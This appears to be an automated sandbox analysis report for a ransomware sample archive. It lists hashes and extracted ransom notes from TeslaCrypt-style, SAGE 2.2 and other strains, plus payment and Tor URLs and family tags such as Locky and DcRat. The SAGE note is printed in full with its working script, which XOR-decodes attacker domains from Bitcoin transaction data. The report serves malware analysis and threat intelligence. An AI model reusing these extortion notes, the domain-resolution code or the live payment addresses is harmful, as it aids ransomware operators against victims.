Analysis

  • max time kernel
    201s
  • max time network
    277s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-11-2024 17:43

General

  • Target

    RNSM00288.7z

  • Size

    13.4MB

  • MD5

    f44bed2280092b2ab1600098b32f2d4b

  • SHA1

    b747e8ef1a04fcbcce623299edbaebc5308327bf

  • SHA256

    e64e0e78a07088d7870dd8d4c021be360566cd35f8838e19cfd9efbc8799f17d

  • SHA512

    3b51e37a90f345f58a0d272a872dada71eb5b827149a001cf46979e7018036f69ed5baec268bd75d9a18de6e8328c6058200d55537286b1f0a3e3623eb4d99a2

  • SSDEEP

    393216:30dEla/6oM6wQcgz5bLXUv6KB3Wn4EUmRtqGKTF6ahmx8wOYt:oEA/cQPhbUv6KJyfqhhmjOS

Malware Config

Extracted

Path

C:\ReadDecryptFilesHere.txt

Ransom Note
Your personal files have been encrypted! Your documents, photos, databases and other important files have been encrypted using a military grade encryption algorithm. The only way to decrypt your files is with a unique decryption key stored remotely in our servers. All your files are now unusable until you decrypt them. You have 24h to pay for the release of your decryption key. After 24h have passed, your decryption key will be erased and you will never be able to restore your files. To obtain your unique decryption key you will need to pay $500 using a PayPal MyCash voucher. If the payment is not sent within 12h the amount to obtain your decryption key will be $1000. PayPal MyCash vouchers can be purchased at CVS, 7-Eleven, Dollar General, fred`s Super Dollar, Family Dollar and many other stores. -------------------------------------------------------------------------------------------------------------------------- After obtaining your PayPal MyCash voucher code you need to send an email to [email protected] with the following information. 1. Your $500 PayPal MyCash PIN 2. Your encryption ID = JSMURNPT2182-CD9A Shortly after the voucher is received and verified, all your files will be restored to their previous state. All payments are processed and verified manually, do not try to send invalid PIN numbers. --------------------------------------------------------------------------------------------------------------------------

Extracted

Path

C:\Users\Admin\Pictures\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; line-height: 1.2; } h2 { color: #555; text-align: center; line-height: 1.2; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 0.2em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","fr","es","no","pt","nl","kr","ms","zh","tr","vi","hi","jv","fa","ar"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AfRop6i5vO7I2dBW-uYzWmCSe3pQPxD889BaiiswX1SZVyXA1AgxMUnA" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-no' onclick="javascript:return setLang('no')">Norsk</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <br/><span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-ms' onclick="javascript:return setLang('ms')">Bahasa Melayu</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> <span class='ls ls-tr' onclick="javascript:return setLang('tr')">Türkçe</span> <span class='ls ls-vi' onclick="javascript:return setLang('vi')">Tiếng Việt</span> <span class='ls ls-hi' onclick="javascript:return setLang('hi')">हिन्दी</span> <span class='ls ls-jv' onclick="javascript:return setLang('jv')">Basa Jawa</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-no' >Filen er kryptert men kan bli gjenopprettet</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-ms' >Fail ini dienkripsikan tetapi boleh dipulih semula.</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2><h2 class='l l-tr' >Dosya şifrelenmiş ancak geri yüklenebilir.</h2><h2 class='l l-vi' >Tập tin bị mã hóa nhưng có thể được khôi phục</h2><h2 class='l l-hi' >फाइल एनक्रिप्‍टड हैं लेकिन रिस्‍टोर की जा सकती हैं</h2><h2 class='l l-jv' >File ini dienkripsi tetapi dapat dikembalikan</h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-no' >Filen du prøvde åpne og andre viktige filer på datamaskinen din ble kryptert av "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-ms' >Fail yang anda cuba buka dan fail penting yang lain di komputer anda telah dienkripskan oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2><h2 class='l l-tr' >Açmaya çalıştığınız dosya ve diğer önemli dosyalarınızı bilgisayarınızda "SAGE 2.2 Ransomware" tarafından şifrelenmiş.</h2><h2 class='l l-vi' >Tập tin mà bạn cố mở và những tập tin quan trọng khác trên máy tính của bạn bị mã hóa bởi "SAGE 2.2 Ransomware".</h2><h2 class='l l-hi' >वो फाइल जिसे आपने खोलने की कोशिश की और आपके कंप्‍यूटर पर बाकी महत्‍वपूर्ण फाइले हमारी ओर से इंक्रिप्टिड की गई हैं "SAGE 2.2 Ransomware"।</h2><h2 class='l l-jv' >File yang Anda coba untuk buka dan file penting lain di komputer Anda yang dienkripsi oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که ش�
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+kuuko.txt

Ransom Note
----- NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://ytrest84y5i456hghadefdsd.pontogrot.com/32D525B2367AD7EE 2. http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/32D525B2367AD7EE 3. http://5rport45vcdef345adfkksawe.bematvocal.at/32D525B2367AD7EE If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser 3. Type in the address bar: xlowfznrg4wf7dli.onion/32D525B2367AD7EE 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://ytrest84y5i456hghadefdsd.pontogrot.com/32D525B2367AD7EE http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/32D525B2367AD7EE http://5rport45vcdef345adfkksawe.bematvocal.at/32D525B2367AD7EE *-*-* Your personal page Tor-Browser: xlowfznrg4wf7dli.ONION/32D525B2367AD7EE
URLs

http://ytrest84y5i456hghadefdsd.pontogrot.com/32D525B2367AD7EE

http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/32D525B2367AD7EE

http://5rport45vcdef345adfkksawe.bematvocal.at/32D525B2367AD7EE

http://xlowfznrg4wf7dli.onion/32D525B2367AD7EE

http://xlowfznrg4wf7dli.ONION/32D525B2367AD7EE

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+lpoqi.txt

Family

teslacrypt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA4096 More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA4096 Key , both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1 - http://sondr5344ygfweyjbfkw4fhsefv.heliofetch.at/CE759B2D4C998DF 2 - http://pts764gt354fder34fsqw45gdfsavadfgsfg.kraskula.com/CE759B2D4C998DF 3 - http://yyre45dbvn2nhbefbmh.begumvelic.at/CE759B2D4C998DF If for some reasons the addresses are not available, follow these steps: 1 - Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2 - After a successful installation, run the browser 3 - Type in the address bar: xlowfznrg4wf7dli.onion/CE759B2D4C998DF 4 - Follow the instructions on the site IMPORTANT INFORMATION Your personal pages http://sondr5344ygfweyjbfkw4fhsefv.heliofetch.at/CE759B2D4C998DF http://pts764gt354fder34fsqw45gdfsavadfgsfg.kraskula.com/CE759B2D4C998DF http://yyre45dbvn2nhbefbmh.begumvelic.at/CE759B2D4C998DF Your personal page Tor-Browser xlowfznrg4wf7dli.ONION/CE759B2D4C998DF
URLs

http://sondr5344ygfweyjbfkw4fhsefv.heliofetch.at/CE759B2D4C998DF

http://pts764gt354fder34fsqw45gdfsavadfgsfg.kraskula.com/CE759B2D4C998DF

http://yyre45dbvn2nhbefbmh.begumvelic.at/CE759B2D4C998DF

http://xlowfznrg4wf7dli.ONION/CE759B2D4C998DF

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+qiweg.txt

Ransom Note
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/32D525B2367AD7EE 2. http://b4youfred5485jgsa3453f.italazudda.com/32D525B2367AD7EE 3. http://5rport45vcdef345adfkksawe.bematvocal.at/32D525B2367AD7EE If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization 3. Type in the address bar: fwgrhsao3aoml7ej.onion/32D525B2367AD7EE 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/32D525B2367AD7EE http://b4youfred5485jgsa3453f.italazudda.com/32D525B2367AD7EE http://5rport45vcdef345adfkksawe.bematvocal.at/32D525B2367AD7EE *-*-* Your personal page Tor-Browser: fwgrhsao3aoml7ej.ONION/32D525B2367AD7EE *-*-* Your personal identification ID: 32D525B2367AD7EE
URLs

http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/32D525B2367AD7EE

http://b4youfred5485jgsa3453f.italazudda.com/32D525B2367AD7EE

http://5rport45vcdef345adfkksawe.bematvocal.at/32D525B2367AD7EE

http://fwgrhsao3aoml7ej.onion/32D525B2367AD7EE

http://fwgrhsao3aoml7ej.ONION/32D525B2367AD7EE

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+pqnjv.txt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com What's the matter with your files? Your data was secured using a strong encryption with RSA4096. Use the link down below to find additional information on the encryption keys using RSA4096:https://en.wikipedia.org/wiki/RSA_(cryptosystem) What exactly that means? It means that on a structural level your files have been transformed. You won't be able to use, read, see or work with them anymore. In other words they are useless, however, there is a possibility to restore them with our help. What exactly happened to your files? *** Two personal RSA4096 keys were generated for your PC/Laptop; one key is public, another key is private. *** All your data and files were encrypted by the means of the public key, which you received over the web. *** In order to decrypt your data and gain access to your computer you need a private key and a decryption software, which can be found on one of our secret servers. What should you do next? There are several options for you to consider: 1. You can wait for a while until the price of a private key will raise, so you will have to pay twice as much to access your files or 2. You can start getting BitCoins right now and get access to your data quite fast. In case you have valuable files, we advise you to act fast as there is no other option rather than paying in order to get back your data. In order to obtain specific instructions, please access your personal homepage by choosing one of the few addresses down below: http://t54ndnku456ngkwsudqer.wallymac.com/565D3C565EFC27E http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/565D3C565EFC27E http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/565D3C565EFC27E If you can't access your personal homepage or the addresses are not working, complete the following steps: 1. Download TOR Browser - http://www.torproject.org/projects/torbrowser.html.en 2. Install TOR Browser 3. Open TOR Browser 4. Insert the following link in the address bar: k7tlx3ghr3m4n2tu.onion/565D3C565EFC27E 5. Follow the steps on your screen IMPORTANT INFORMATION Your personal homepages: http://t54ndnku456ngkwsudqer.wallymac.com/565D3C565EFC27E http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/565D3C565EFC27E http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/565D3C565EFC27E Your personal page Tor-Browser k7tlx3ghr3m4n2tu.onion/565D3C565EFC27E Your personal identification ID: 565D3C565EFC27E
URLs

http://t54ndnku456ngkwsudqer.wallymac.com/565D3C565EFC27E

http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/565D3C565EFC27E

http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/565D3C565EFC27E

http://k7tlx3ghr3m4n2tu.onion/565D3C565EFC27E

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+armja.txt

Ransom Note
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server. What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/32D525B2367AD7EE 2. http://kk4dshfjn45tsnkdf34fg.tatiejava.at/32D525B2367AD7EE 3. http://94375hfsjhbdfkj5wfg.aladadear.com/32D525B2367AD7EE If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization 3. Type in the address bar: fwgrhsao3aoml7ej.onion/32D525B2367AD7EE 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *** Your personal pages: http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/32D525B2367AD7EE http://kk4dshfjn45tsnkdf34fg.tatiejava.at/32D525B2367AD7EE http://94375hfsjhbdfkj5wfg.aladadear.com/32D525B2367AD7EE *** Your personal page Tor-Browser: fwgrhsao3aoml7ej.ONION/32D525B2367AD7EE *** Your personal identification ID: 32D525B2367AD7EE
URLs

http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/32D525B2367AD7EE

http://kk4dshfjn45tsnkdf34fg.tatiejava.at/32D525B2367AD7EE

http://94375hfsjhbdfkj5wfg.aladadear.com/32D525B2367AD7EE

http://fwgrhsao3aoml7ej.onion/32D525B2367AD7EE

http://fwgrhsao3aoml7ej.ONION/32D525B2367AD7EE

Signatures

  • DcRat 11 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Locky

    Ransomware strain released in 2016, with advanced features like anti-analysis.

  • Locky (Osiris variant)

    Variant of the Locky ransomware seen in the wild since early 2017.

  • Locky family
  • Locky_osiris family
